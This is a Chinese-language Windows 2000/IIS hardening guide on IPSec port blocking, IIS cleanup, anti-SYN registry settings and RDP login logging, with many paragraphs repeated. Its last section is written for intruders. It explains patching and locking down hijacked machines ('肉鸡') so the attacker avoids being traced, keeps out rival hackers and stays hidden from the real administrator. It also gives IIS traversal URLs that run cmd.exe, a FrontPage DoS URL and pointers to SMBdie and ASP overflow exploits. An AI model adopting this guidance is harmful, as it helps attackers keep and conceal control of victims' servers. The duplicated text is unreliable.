6.在“IP通信目标”的“目标地址”选择“我的IP地址”,点下一步;
7.在“IP协议类型”的“选择协议类型”选择“TCP”,点下一步;
8.在“筛选器向导”的“设置IP协议端口”里第一拦“从任意端口”,第二拦“到此端口”并且添上“139”,点下一步;
9.点“完成”,然后在点“关闭”,回到“管理IP筛选器表和筛选器操作”;
10.选择“管理筛选器操作”,点“添加”;
11.这时会出现一个“筛选器操作向导”的,点“下一步”,在“名称“里添上“禁止139端口”连接,点下一步,选择“阻止”,再点下一步;
12.点“完成”和“关闭”。
445端口
方法和上面的139端口的方法一样,只是注意在添加筛选器操作的时候不能用同一个“阻止”筛选器操作,否则规则没有作用。
方法和上面的139端口的方法一样,只是注意在添加筛选器操作的时候不能用同一个“阻止”筛选器操作,否则规则没有作用。
完成上面两项操作后,回到“IP安全策略,在本地机器”,右点“IP安全策略”:
1.“IP安全策略向导”,点“下一步”,在“名称”中,添入“禁止使用139,445端口连接”一路点下一步,完成。
2.在“禁止使用139,445端口连接”里点“添加”,出现“安全规则向导”,一路下一步,到“IP筛选器列表”,选择“禁止139”(就是我们先前关闭139的时候添入的那名称),点下一步,在“筛选器操作”选择“禁止139”,点下一步,最后,点“完成”,“确定”;
3.通过“添加”将禁用445端口的筛选器列表和操作也添进去一路下一步,到“IP筛选器列表”,选择“禁止445”,点下一步,在“筛选器操作”里选“禁止445”,点下一步然后点“关闭”,回到“属性”窗口;
最后,只需要将刚才配置好的东西指派就成了。
1.“IP安全策略向导”,点“下一步”,在“名称”中,添入“禁止使用139,445端口连接”一路点下一步,完成。
2.在“禁止使用139,445端口连接”里点“添加”,出现“安全规则向导”,一路下一步,到“IP筛选器列表”,选择“禁止139”(就是我们先前关闭139的时候添入的那名称),点下一步,在“筛选器操作”选择“禁止139”,点下一步,最后,点“完成”,“确定”;
3.通过“添加”将禁用445端口的筛选器列表和操作也添进去一路下一步,到“IP筛选器列表”,选择“禁止445”,点下一步,在“筛选器操作”里选“禁止445”,点下一步然后点“关闭”,回到“属性”窗口;
最后,只需要将刚才配置好的东西指派就成了。
135端口
对于135端口开放的问题,可以在你的防火墙上,增加一条规则:拒绝所有的这?*氲腢DP包,目的端口是135,源端口是7,19,或者135,这样可以保护内部的系统,防止来自外部的***。大多数防火墙或者包过滤器已经设置了很多严格的规则,已覆盖了这条过滤规则,但任需注意:有一些NT的应用程序,它们依靠UDP135端口进行合法的通讯,而打开你135的端口与NT的RPC服务进行通讯。如果真是这样,你一定要在那些原始地址的系统上(需要135口通讯),实施上述的规则,指定来自这些系统的通讯可以通过防火墙,或者,可以被***检测系统所忽略,以便维持那些应用程序的正常连接。
对于135端口开放的问题,可以在你的防火墙上,增加一条规则:拒绝所有的这?*氲腢DP包,目的端口是135,源端口是7,19,或者135,这样可以保护内部的系统,防止来自外部的***。大多数防火墙或者包过滤器已经设置了很多严格的规则,已覆盖了这条过滤规则,但任需注意:有一些NT的应用程序,它们依靠UDP135端口进行合法的通讯,而打开你135的端口与NT的RPC服务进行通讯。如果真是这样,你一定要在那些原始地址的系统上(需要135口通讯),实施上述的规则,指定来自这些系统的通讯可以通过防火墙,或者,可以被***检测系统所忽略,以便维持那些应用程序的正常连接。
关于17,19,7,9端口的打开应该是属于使用的是默认服务配置,关闭的方法;先去下载一个叫做 Configure Port Blocker 的软件,该软件可以直接删除不必要的端口
80端口
使用安全有效的验证用户身份的方法(建议不允许匿名登陆);
在IIS中,将HTTP404 Object Not Found 出错页面通过URL重定向到一个定制的HTM文件。
使用安全有效的验证用户身份的方法(建议不允许匿名登陆);
在IIS中,将HTTP404 Object Not Found 出错页面通过URL重定向到一个定制的HTM文件。
IIS服务器
1.更改默认的IIS路径,把C盘下的InetPub目录彻底删除,然后随便在什么盘建立一个,在IIS管理器中将主目录指向我们建立的目录
2.打开IIS服务器,到“主目录”页面,找到“设置”,删除不必要的映射,留下我们要用的。删除在IIS管理器中右点主机—属性—WWW 服务编辑—主目录配置—应用程序映射。在那个窗口的应用程序调试书签内,讲脚本错误消息改为发送文本,错误文本随便怎么写好了。退出时,让虚拟站点继承设定的属性。
3.删除默认的那些不必要用到的虚拟目录,比如mstdc,scripts等
4.到C:/Winnt/system32下,把 FTP , CMD, TFTP 这样重要的EXE程序进行一次全新的设置,把系统的“IUSR_计算机名”,这个用户拒绝访问。
1.更改默认的IIS路径,把C盘下的InetPub目录彻底删除,然后随便在什么盘建立一个,在IIS管理器中将主目录指向我们建立的目录
2.打开IIS服务器,到“主目录”页面,找到“设置”,删除不必要的映射,留下我们要用的。删除在IIS管理器中右点主机—属性—WWW 服务编辑—主目录配置—应用程序映射。在那个窗口的应用程序调试书签内,讲脚本错误消息改为发送文本,错误文本随便怎么写好了。退出时,让虚拟站点继承设定的属性。
3.删除默认的那些不必要用到的虚拟目录,比如mstdc,scripts等
4.到C:/Winnt/system32下,把 FTP , CMD, TFTP 这样重要的EXE程序进行一次全新的设置,把系统的“IUSR_计算机名”,这个用户拒绝访问。
其他
1.关掉Guest帐号:把这个账号停用,任何时候都不允许使用他登陆。最好是给他设置一个超复杂密码,用记事本乱打他什么数字,大小写字母,特殊符号,弄他二十几位出来,然后从记事本上复制进去;
2.删除掉没有用处的用户;
3.把Administrator帐号改名,随便改成一个什么。这个帐号好象可以使人用穷举法一次一次的尝试破解的。或者使用超长密码;
4.共享文件的权限改成“授权用户”;
5.打开审核策略记录下比如尝试用户密码,改变帐户策略,未经许可的文件访问等;
6.密码策略得开启;
7.不让系统显示上次登陆的用户名:修改HKLM / Software / Microsoft /Windows NT / CurrentVersion /Winlogon / DontDisplay LastUserName 把 REG_SZ 的键值 改为 1;
8.禁止建立空连接:默认情况下,任何人都可以通过空连接连上服务器,猜密码。修改Local_Machine / System / CurrentControlSet / Control / LSA-RestrictAnonymous 的值改成1;
9.如果服务器不玩游戏的话,把DirectDraw关掉: HKLM / SYSTEM / CurrentControlSet / Control / GraphicsDrivers /DGI的Timeout(TEG_DWORD)为 0;
10.禁止Dump File 的产生:这个东西能提供给别人一些敏感信息,如应用程序的密码等,记录的是在死机,蓝屏时的信息,关掉。控制面板—系统属性—高级—启动和故障恢复,把“写入调试信息”改为 无。
1.关掉Guest帐号:把这个账号停用,任何时候都不允许使用他登陆。最好是给他设置一个超复杂密码,用记事本乱打他什么数字,大小写字母,特殊符号,弄他二十几位出来,然后从记事本上复制进去;
2.删除掉没有用处的用户;
3.把Administrator帐号改名,随便改成一个什么。这个帐号好象可以使人用穷举法一次一次的尝试破解的。或者使用超长密码;
4.共享文件的权限改成“授权用户”;
5.打开审核策略记录下比如尝试用户密码,改变帐户策略,未经许可的文件访问等;
6.密码策略得开启;
7.不让系统显示上次登陆的用户名:修改HKLM / Software / Microsoft /Windows NT / CurrentVersion /Winlogon / DontDisplay LastUserName 把 REG_SZ 的键值 改为 1;
8.禁止建立空连接:默认情况下,任何人都可以通过空连接连上服务器,猜密码。修改Local_Machine / System / CurrentControlSet / Control / LSA-RestrictAnonymous 的值改成1;
9.如果服务器不玩游戏的话,把DirectDraw关掉: HKLM / SYSTEM / CurrentControlSet / Control / GraphicsDrivers /DGI的Timeout(TEG_DWORD)为 0;
10.禁止Dump File 的产生:这个东西能提供给别人一些敏感信息,如应用程序的密码等,记录的是在死机,蓝屏时的信息,关掉。控制面板—系统属性—高级—启动和故障恢复,把“写入调试信息”改为 无。
终端服务的设置
1、第一步,更改终端服务的服务器端设置。
打开注册表,找到类似这样的键值HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/Wds/Repwd/Tds/Tcp, 找到PortNumber。0xd3d,这个是16进制,就是3389,这个值是RDP(远程桌面协议)的默认值,也就是说用来配置以后新建的RDP服务的,要改已经建立的RDP服务,我们去下一个键值:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/TerminalServer/WinStations这里应该有一个或多个类似RDP-TCP的子健(取决于你建立了多少个RDP服务),一样改掉PortNumber。
2、第二步,改客户端。
再来改客户端:打开客户端连接管理器,按照正常的步骤建立一个客户 端连接的快捷方式,选中这个连接,然后在“文件”菜单里选择“导出”(Menu->File->Export),这个操作会生成一个cns文件,就是终端服务客户端的配置文件,你可以用文本编辑器(比如记事本)编辑这个文件,找到“Server Port=3389”,改成你要的端口,然后再选导入(Menu->File->Import),这是的客户端快捷方式已经变成你需要的端口了。
需要注意的是,从微软主页上下载的终端服务客户端Terminal Service Client(MSI版)以及ActiveX版都不能更改端口,只有使用Win2000服务器版终端服务自带的“制作安装盘”功能制作版本可以改端口,这个功能在管理工具的“终端服务客户端生成器”(Terminal Service Client Creator)中。
对于日志的问题,其实Terminal Service自己是有日志功能的,在管理工具中打开远程控制服务配置(Terminal Service Configration),点击“连接”,右击你想配置的RDP服务(比如RDP-TCP(Microsoft RDP5.0)),选中书签“权限”,点击左下角的“高级”,看见上面那个“审核”了吗?我们来加入一个Everyone组,这代表所有的用户,然后审核他的“连接”、“断开”、“注销”的成功和“登陆”的功能和失败就足够了,审核太多了反而不好,这个审核试记录在安全日志中的,可以从“管理工具”->“日志查看器”中查看。现在什么人什么时候登陆都一清二楚了,可是它却不记录客户端的IP(只能查看在线用户的ip)而是记录计算机名。我们建立一个.bat文件,叫做TSLog.bat,这个文件用来记录登录者的ip,内容如下:
time /t>>TSLog.log
netstat -n -p tcp|find ":3389">>TSLog.log
start Explorer
来解释一下这个文件的含义:
第一行是记录用户登陆的时间,Time/t的意思是直接返回系统时间(如果不加/t,系统会等待你输入新的时间),然后我们用追加符号>>把这个时间记入TSLog.log第二行是记录用户的ip地址,Netstat是用来显示当前网络连接状况的命令,-n表示显示ip和端口而不是域名、协议,-p tcp是只显示tcp协议,然后我们用管道符号“|”把这个命令的结果输出给Find命令,从输出结果中查找包含“:3389”的行(这就是我们要得客户的ip所在行,如果你改了终端服务的端口,这个数值也要作相应的改变),最后我们同样把这个结果重定向到日志文件TSLog.log中去,于是在TSLog.log文件中,记录格式如下:
22:40
TCP 192.168.12.28:3389 192.168.10.123:4903ESTABLISHED
22:54
TCP 192.168.12.28:3389 192.168.12.29:1039ESTABLISHED
也就是说只要TSLog.bat文件一运行,所有连在3389端口的ip都会被记录,那么如何让这个批处理文件运行呢?终端服务允许我们为用户自定义起始的程序,在终端服务配置中,我们覆盖用户的登陆脚本设置并指定TSLog.bat为用户登录时需要打开的脚本,这样每个用户登录后都必须执行这个脚本,因为默认得脚本(相当于SHELL环境)是Explorer(资源管理器),所以我在TSLog.bat的最后一行加上了启动Explorer的命令start Explorer,如果不加这一行命令,用户是没有办法进入桌面的。当然,如果你只需要给用户特定的SHELL:例如cmd.exe或者word.exe你也可以把start explorer替换成任意的SHELL。这个脚本也可以有其他的写法,例如写一个脚本把每个登陆用户的ip发送到自己的信箱对于很重要的服务器也是一个很好的方法。正常情况下,一般的用户没有查看终端服务设置的权限,所以他不会知道你对登陆进行了ip审核,只要把TSLog.bat文件和TSLog.log文件放在比较隐蔽的目录里就足够了,不过需要注意的是这只是一个简单的终端服务日志攻略,并没有太多的安全保障措施和权限机制
1、第一步,更改终端服务的服务器端设置。
打开注册表,找到类似这样的键值HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/Wds/Repwd/Tds/Tcp, 找到PortNumber。0xd3d,这个是16进制,就是3389,这个值是RDP(远程桌面协议)的默认值,也就是说用来配置以后新建的RDP服务的,要改已经建立的RDP服务,我们去下一个键值:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/TerminalServer/WinStations这里应该有一个或多个类似RDP-TCP的子健(取决于你建立了多少个RDP服务),一样改掉PortNumber。
2、第二步,改客户端。
再来改客户端:打开客户端连接管理器,按照正常的步骤建立一个客户 端连接的快捷方式,选中这个连接,然后在“文件”菜单里选择“导出”(Menu->File->Export),这个操作会生成一个cns文件,就是终端服务客户端的配置文件,你可以用文本编辑器(比如记事本)编辑这个文件,找到“Server Port=3389”,改成你要的端口,然后再选导入(Menu->File->Import),这是的客户端快捷方式已经变成你需要的端口了。
需要注意的是,从微软主页上下载的终端服务客户端Terminal Service Client(MSI版)以及ActiveX版都不能更改端口,只有使用Win2000服务器版终端服务自带的“制作安装盘”功能制作版本可以改端口,这个功能在管理工具的“终端服务客户端生成器”(Terminal Service Client Creator)中。
对于日志的问题,其实Terminal Service自己是有日志功能的,在管理工具中打开远程控制服务配置(Terminal Service Configration),点击“连接”,右击你想配置的RDP服务(比如RDP-TCP(Microsoft RDP5.0)),选中书签“权限”,点击左下角的“高级”,看见上面那个“审核”了吗?我们来加入一个Everyone组,这代表所有的用户,然后审核他的“连接”、“断开”、“注销”的成功和“登陆”的功能和失败就足够了,审核太多了反而不好,这个审核试记录在安全日志中的,可以从“管理工具”->“日志查看器”中查看。现在什么人什么时候登陆都一清二楚了,可是它却不记录客户端的IP(只能查看在线用户的ip)而是记录计算机名。我们建立一个.bat文件,叫做TSLog.bat,这个文件用来记录登录者的ip,内容如下:
time /t>>TSLog.log
netstat -n -p tcp|find ":3389">>TSLog.log
start Explorer
来解释一下这个文件的含义:
第一行是记录用户登陆的时间,Time/t的意思是直接返回系统时间(如果不加/t,系统会等待你输入新的时间),然后我们用追加符号>>把这个时间记入TSLog.log第二行是记录用户的ip地址,Netstat是用来显示当前网络连接状况的命令,-n表示显示ip和端口而不是域名、协议,-p tcp是只显示tcp协议,然后我们用管道符号“|”把这个命令的结果输出给Find命令,从输出结果中查找包含“:3389”的行(这就是我们要得客户的ip所在行,如果你改了终端服务的端口,这个数值也要作相应的改变),最后我们同样把这个结果重定向到日志文件TSLog.log中去,于是在TSLog.log文件中,记录格式如下:
22:40
TCP 192.168.12.28:3389 192.168.10.123:4903ESTABLISHED
22:54
TCP 192.168.12.28:3389 192.168.12.29:1039ESTABLISHED
也就是说只要TSLog.bat文件一运行,所有连在3389端口的ip都会被记录,那么如何让这个批处理文件运行呢?终端服务允许我们为用户自定义起始的程序,在终端服务配置中,我们覆盖用户的登陆脚本设置并指定TSLog.bat为用户登录时需要打开的脚本,这样每个用户登录后都必须执行这个脚本,因为默认得脚本(相当于SHELL环境)是Explorer(资源管理器),所以我在TSLog.bat的最后一行加上了启动Explorer的命令start Explorer,如果不加这一行命令,用户是没有办法进入桌面的。当然,如果你只需要给用户特定的SHELL:例如cmd.exe或者word.exe你也可以把start explorer替换成任意的SHELL。这个脚本也可以有其他的写法,例如写一个脚本把每个登陆用户的ip发送到自己的信箱对于很重要的服务器也是一个很好的方法。正常情况下,一般的用户没有查看终端服务设置的权限,所以他不会知道你对登陆进行了ip审核,只要把TSLog.bat文件和TSLog.log文件放在比较隐蔽的目录里就足够了,不过需要注意的是这只是一个简单的终端服务日志攻略,并没有太多的安全保障措施和权限机制
还需要注意
修改注册表提高Win2000抗DDoS功击能力
修改注册表提高Win2000抗DDoS功击能力
修改注册表提高Win2000抗DDoS能力
从正确看待DoS与DDoS说起
相信大家都一定不会对这两个这个词感到陌生,是的,拒绝服务***(Denial of Service),以及分布式
拒绝服务***(Distributed Denial of Service)。
所谓拒绝服务,是指在特定***发生后, 被***的对象不能及时提供应有的服务,例如本来应提供
网站服务(HTTP Service)而不能提供网站服务,电子邮件服务器(SMTP,POP3)不能提供收发信件等等
的功能,基本上,阻绝服务***通常利用大量的网络数据包,以瘫痪对方之网络及主机,使得正常的使用者
无法获得主机及时的服务。
分布式拒绝服务,简单的说就是用远超过目标处理能力的海量数据包消耗可用系统,以及网络带宽,造成网络
服务瘫痪。
也许是和媒体的过分关注有关,DoS***特别是DDoS***,似乎一夜之间就流行了起来,搞的大大小小的网管们,
只要服务器一有故障,就异常兴奋的高呼“我被DDoS了!”,脸上仿佛写着无比的光荣和骄傲。
其实在我们的周围,真正意义上的DDoS其实并不多,毕竟发动一次DDoS***所需要的资源非常的多,但实实在在
的***却又不停的发生着,这里面,绝大多数,都是普通的拒绝服务***。普通级别的***,如何
防护,也成为很多网络管理员最头疼的问题,于是到处打听,结果往往千篇一律,“购买我们的
硬件防火墙吧”。硬件防火墙,包括专用抗拒绝服务***产品的确是好,但基本价格都十分昂贵,效果虽然好,
可从投资以及保护投资的角度来说,未免有些过火。
其实从操作系统角度来说,本身就藏有很多的功能,只是很多是需要我们慢慢的去挖掘的。这里我给大家简单
介绍一下如何在Win2000环境下修改注册表,增强系统的抗DoS能力。
细节:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters]
'关闭无效网关的检查。当服务器设置了多个网关,这样在网络不通畅的时候系统会尝试连接
'第二个网关,通过关闭它可以优化网络。
"EnableDeadGWDetect"=dword:00000000
'禁止响应ICMP重定向报文。此类报文有可能用以***,所以系统应该拒绝接受ICMP重定向报文。
"EnableICMPRedirects"=dword:00000000
"EnableICMPRedirects"=dword:00000000
'不允许释放NETBIOS名。当***者发出查询服务器NETBIOS名的请求时,可以使服务器禁止响应。
'注意系统必须安装SP2以上
"NonameReleaseOnDemand"=dword:00000001
'注意系统必须安装SP2以上
"NonameReleaseOnDemand"=dword:00000001
'发送验证保持活动数据包。该选项决定TCP间隔多少时间来确定当前连接还处于连接状态,
'不设该值,则系统每隔2小时对TCP是否有闲置连接进行检查,这里设置时间为5分钟。
"KeepAliveTime"=dword:000493e0
'不设该值,则系统每隔2小时对TCP是否有闲置连接进行检查,这里设置时间为5分钟。
"KeepAliveTime"=dword:000493e0
'禁止进行最大包长度路径检测。该项值为1时,将自动检测出可以传输的数据包的大小,
'可以用来提高传输效率,如出现故障或安全起见,设项值为0,表示使用固定MTU值576bytes。
"EnablePMTUDiscovery"=dword:00000000
'可以用来提高传输效率,如出现故障或安全起见,设项值为0,表示使用固定MTU值576bytes。
"EnablePMTUDiscovery"=dword:00000000
'启动syn***保护。缺省项值为0,表示不开启***保护,项值为1和2表示启动syn***保护,设成2之后
'安全级别更高,对何种状况下认为是***,则需要根据下面的TcpMaxHalfOpen和TcpMaxHalfOpenRetried值
'设定的条件来触发启动了。这里需要注意的是,NT4.0必须设为1,设为2后在某种特殊数据包下会导致系统重启。
"SynAttackProtect"=dword:00000002
'安全级别更高,对何种状况下认为是***,则需要根据下面的TcpMaxHalfOpen和TcpMaxHalfOpenRetried值
'设定的条件来触发启动了。这里需要注意的是,NT4.0必须设为1,设为2后在某种特殊数据包下会导致系统重启。
"SynAttackProtect"=dword:00000002
'同时允许打开的半连接数量。所谓半连接,表示未完整建立的TCP会话,用netstat命令可以看到呈SYN_RCVD状态
'的就是。这里使用微软建议值,服务器设为100,高级服务器设为500。建议可以设稍微小一点。
"TcpMaxHalfOpen"=dword:00000064
'的就是。这里使用微软建议值,服务器设为100,高级服务器设为500。建议可以设稍微小一点。
"TcpMaxHalfOpen"=dword:00000064
'判断是否存在***的触发点。这里使用微软建议值,服务器为80,高级服务器为400。
"TcpMaxHalfOpenRetried"=dword:00000050
"TcpMaxHalfOpenRetried"=dword:00000050
'设置等待SYN-ACK时间。缺省项值为3,缺省这一过程消耗时间45秒。项值为2,消耗时间为21秒。
'项值为1,消耗时间为9秒。最低可以设为0,表示不等待,消耗时间为3秒。这个值可以根据遭受***规模修改。
'微软站点安全推荐为2。
"TcpMaxConnectResponseRetransmissions"=dword:00000001
'项值为1,消耗时间为9秒。最低可以设为0,表示不等待,消耗时间为3秒。这个值可以根据遭受***规模修改。
'微软站点安全推荐为2。
"TcpMaxConnectResponseRetransmissions"=dword:00000001
'设置TCP重传单个数据段的次数。缺省项值为5,缺省这一过程消耗时间240秒。微软站点安全推荐为3。
"TcpMaxDataRetransmissions"=dword:00000003
"TcpMaxDataRetransmissions"=dword:00000003
'设置syn***保护的临界点。当可用的backlog变为0时,此参数用于控制syn***保护的开启,微软站点安全推荐为5。
"TCPMaxPortsExhausted"=dword:00000005
"TCPMaxPortsExhausted"=dword:00000005
'禁止IP源路由。缺省项值为1,表示不转发源路由包,项值设为0,表示全部转发,设置为2,表示丢弃所有接受的
'源路由包,微软站点安全推荐为2。
"DisableIPSourceRouting"=dword:0000002
'源路由包,微软站点安全推荐为2。
"DisableIPSourceRouting"=dword:0000002
'限制处于TIME_WAIT状态的最长时间。缺省为240秒,最低为30秒,最高为300秒。建议设为30秒。
"TcpTimedWaitDelay"=dword:0000001e
"TcpTimedWaitDelay"=dword:0000001e
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NetBT/Parameters]
'增大NetBT的连接块增加幅度。缺省为3,范围1-20,数值越大在连接越多时提升性能。每个连接块消耗87个字节。
"BacklogIncrement"=dword:00000003
'增大NetBT的连接块增加幅度。缺省为3,范围1-20,数值越大在连接越多时提升性能。每个连接块消耗87个字节。
"BacklogIncrement"=dword:00000003
'最大NetBT的连接快的数目。范围1-40000,这里设置为1000,数值越大在连接越多时允许更多连接。
"MaxConnBackLog"=dword:000003e8
"MaxConnBackLog"=dword:000003e8
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Afd/Parameters]
'配置激活动态Backlog。对于网络繁忙或者易遭受SYN***的系统,建议设置为1,表示允许动态Backlog。
"EnableDynamicBacklog"=dword:00000001
'配置激活动态Backlog。对于网络繁忙或者易遭受SYN***的系统,建议设置为1,表示允许动态Backlog。
"EnableDynamicBacklog"=dword:00000001
'配置最小动态Backlog。默认项值为0,表示动态Backlog分配的自由连接的最小数目。当自由连接数目
'低于此数目时,将自动的分配自由连接。默认值为0,对于网络繁忙或者易遭受SYN***的系统,建议设置为20。
"MinimumDynamicBacklog"=dword:00000014
'低于此数目时,将自动的分配自由连接。默认值为0,对于网络繁忙或者易遭受SYN***的系统,建议设置为20。
"MinimumDynamicBacklog"=dword:00000014
'最大动态Backlog。表示定义最大"准"连接的数目,主要看内存大小,理论每32M内存最大可以
'增加5000个,这里设为20000。
"MaximumDynamicBacklog"=dword:00002e20
'增加5000个,这里设为20000。
"MaximumDynamicBacklog"=dword:00002e20
'每次增加的自由连接数据。默认项值为5,表示定义每次增加的自由连接数目。对于网络繁忙或者易遭受SYN***
'的系统,建议设置为10。
"DynamicBacklogGrowthDelta"=dword:0000000a
'的系统,建议设置为10。
"DynamicBacklogGrowthDelta"=dword:0000000a
以下部分需要根据实际情况手动修改
'-------------------------------------------------------------------------------------------------
'[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters]
'启用网卡上的安全过滤
'"EnableSecurityFilters"=dword:00000001
'
'同时打开的TCP连接数,这里可以根据情况进行控制。
'"TcpNumConnections"=
'
'该参数控制 TCP 报头表的大小限制。在有大量 RAM 的机器上,增加该设置可以提高 SYN ***期间的响应性能。
'"TcpMaxSendFree"=
'
'[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/Interfaces/{自己的网卡接口}]
'禁止路由发现功能。ICMP路由通告报文可以被用来增加路由表纪录,可以导致***,所以禁止路由发现。
"PerformRouterDiscovery "=dword:00000000
'[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters]
'启用网卡上的安全过滤
'"EnableSecurityFilters"=dword:00000001
'
'同时打开的TCP连接数,这里可以根据情况进行控制。
'"TcpNumConnections"=
'
'该参数控制 TCP 报头表的大小限制。在有大量 RAM 的机器上,增加该设置可以提高 SYN ***期间的响应性能。
'"TcpMaxSendFree"=
'
'[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/Interfaces/{自己的网卡接口}]
'禁止路由发现功能。ICMP路由通告报文可以被用来增加路由表纪录,可以导致***,所以禁止路由发现。
"PerformRouterDiscovery "=dword:00000000
理由:避免被追踪,防止同行破坏,可以长期的使用,使自己更安全,让你更加的有爱心(一定不要破坏肉鸡<忽略肉鸡国籍>)。
GO~
检查补丁状态:
查看
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Updates/Windows 2000
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/HotFix
或者使用 hfnetchk.exe (微软主页可以找到)
注意,只是看,好心里有个数!
▲ipc$(445 or 139)
主要的问题是因为默认设置允许空会话。通过匿名,可以获得n多的信息。从而进行用户验证***。
问题:你不能改密码。
关掉Admin$
服务器:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services
/LanmanServer/Parameters
AutoShareServer = DWORD:00000000
工作站:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services
/lanmanserver/parameters
AutoShareWks = DWORD:00000000
问题:ipc$还存在,它只是关掉了诸如Admin$,c$之类的东西。
立刻从新启动lanmanserver服务,使其生效
禁止空会话:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA
RestrictAnonymous = DWORD:00000001
或者“控制面板”-“本地(域)安全策略”-“安全选项”里......
立刻从新启动lanmanserver服务,使其生效
问题:
GetAccount.exe这个小工具一样可以轻易的获得用户列表,然后挂字典***。
更改帐号锁定阀值5次。
此外,还有bug,445 or139 上还有一个漏洞,直接让机器挂掉。
***程序 SMBdie.exe 可以 [url]http://packetstorm.linuxsecurity.com/[/url]找到。
相关的补丁 Q326830_W2K_SP4_X86_CN.exe。
注意,这是在为肉鸡打补丁,不是自己的机器。所以绝对不要安装。
很烦?所以直接关掉445or139,最好。注意,要关,两个端口一起。关一个没用。(注意这是指windows 2000,不是nt机器)
通常,是这样的,先连接445端口,如果失败,就会去连接139,所以一定要两个都关了。
如何关闭?
启用ipsec(路由和远程访问也可以),一个强大的玩意。包括icmp。一样可以关掉。也就是ping不通了。
这里不涉及ipsec如何使用,他确实很强大,建议熟练使用。给出两个相关的连接,给不熟悉的朋友们参考一下。
Internet 协议安全 (IPSec) 循序渐进指南
[url]http://www.microsoft.com/china/technet/windows2000/win2ksrv[/url]
/technote/ispstep.asp
IPSec 锁定服务器
[url]http://www.microsoft.com/CHINA/TechNet/windows2000/win2ksrv[/url]
/ipsecld.asp
需要注意的是,我们在为肉鸡做安全,不是自己的机器,当然,有些时候是很矛盾的,毕竟你要改的东西很多,相对的,你被管理员发现的可能也增加了。
通常默认的IPSec的设置是这样的(本地(域)安全策略-ip安全策略)
默认的有3个:安全服务器(要求安全设置) 客户端(只响应) 服务器(请求安全设置)
所以,最好不要创建新的策略,直接在原来的基础上改,也就是3个默认设置的其中一个。以免太过于暴露了。连接类型最好指定为远程访问,以免他内网机器访问不到。最后,选中一个策略,右键-指派。立刻生效了。提一下命令行下的操作。以上是通过终端服务上去操作的。要是行命令下,如何做?推荐使用Resource Kit中的ipsecpol.exe。非常强大,也非常复杂。有兴趣的朋友,可以自己看看。
▲iis (80)
iis 默认安装完后,漏洞就像蜂窝。
unicode漏洞:虽然这个漏洞老的已经成为历史,但还是有的,主要是一些默认安装了iis的机器,也别删除它。之所 [url]http://www.xxx.com/scripts/..Á..Á..Á..Á[/url]..
/winnt/system32/cmd.exe?/c+dir能够执行命令(相当于一个shell)。其实是scripts目录有执行权限。到iis里去掉就可以了。注意一点的是,把每个虚拟目录的的执行权限都去掉。因为在没打补丁之前,所有的有执行权限的虚拟目录都有这个问题,但不一定能被扫描器扫到。如果已经安装了sp2也就不用忙了,补上了。
单个补丁 [url]http://www.microsoft.com/windows2000/downloads/critical[/url]
/q269862/default.asp Q269862_W2K_SP2_x86_CN.EXE
二次解码漏洞:这个漏洞很像上面的那个,一个列 [url]http://www.xxx.com/scripts/..%5c..%5cwinnt/system32[/url]
/cmd.exe?/c+dir+c:/。同样的去掉所有虚拟目录的执行权限。如果安装了sp3,不用忙了,补上了。
单个补丁 [url]http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764[/url] ;
Q293826_W2k_SP3_x86_cn.exe
.printer远程益出:同样,一个成为历史的漏洞。到iis设置里把这个映射删掉就可以了,注意一点的是。ms的iis有点变态。有些时候,你安装删除了一些系统组件。映射可能重新产生。如果安装了sp2,不用忙了,补上了。
单个补丁:Q296576_w2k_sp2_x86_CN.EXE
Index Server远程益出:同样,一个非常危险的漏洞,直接取得system权限。主要是idq.dll有问题,相对应的映射idq,ida。删掉后,也算补上了。如果安装了sp3,不用忙了,补上了。
asp分块编码远程溢出:对于这个漏洞,成功率是很低的。你可以 [url]http://packetstorm.linuxsecurity.com/[/url]找到相关的exploit。而且你所得到的权限是IWAM_computername这个帐号的。但结合一些local exploit。就...。看情况了,如果iis只是被默认安装了,没有网站。把wwwroot目录里的那些默认安装的*.asp删掉,也算是补上了。如果,它已经有web在运做了,这个没办法,或许帮它升级windows update是个不错的注意 :)。安装了sp3,也不要忙了,补上了。
此外,还有一些看asp源码的漏洞,方法n多。如果你肉鸡的没安装sp3的话,最好到iis里把htw和htr删掉。
Frontpage服务器扩展:这个服务所涉及的漏洞特别多,要是肉鸡更本就没用到这个服务建议直接删除它。主要是默认的权限设置问题。允许权限是分配给Everyone组的,有些可以写的,相应的,放后门程序上去(asp.cmd),结合一些local exploit。最后获得admin权限。对“_vti”开头的目录,去掉Everyone组的控制,此外,还有一些拒绝服务漏洞,直接当掉iis。列如:提 [url]http://www.xxx.com/_vti_bin/shtml.dll/com1[/url].。或 [url]http://www.xxx.com/_vti_inf.html[/url]。可以获得服务器的一些信息。多的要死,直接删掉!
snmp服务(udp 161):即简单网络管理协议 。也就是为了方便网络管理而产生的。主要的问题:口令默认。
通常在w, in2k下,能找到运行这个服务的机器是很少的。相对的*nix和路游比较多些。
